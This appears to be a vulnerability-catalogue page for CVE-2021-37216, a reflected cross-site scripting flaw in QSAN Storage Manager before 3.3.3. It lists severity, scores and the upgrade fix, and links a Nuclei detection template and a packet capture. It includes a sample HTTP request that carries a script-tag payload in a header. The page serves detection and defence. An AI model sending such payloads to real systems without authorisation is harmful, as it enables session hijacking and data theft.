🔙 목록으로 돌아가기

CVE-2021-37216: QSAN Storage Manager <3.3.3 - Cross-Site Scripting

TitleQSAN Storage Manager <3.3.3 - Cross-Site Scripting
Authordwisiswant0
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.04668
CVE IDCVE-2021-37216
CWE IDCWE-79
Tags cve cve2021 xss qsan storage vuln

🔍 Vulnerability Description

QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.

🌐 HTTP Request

GET /http_header.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Accept: */*
Accept-Language: en
X-Trigger-XSS: <script>alert(1)</script>
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-37216.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-37216.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A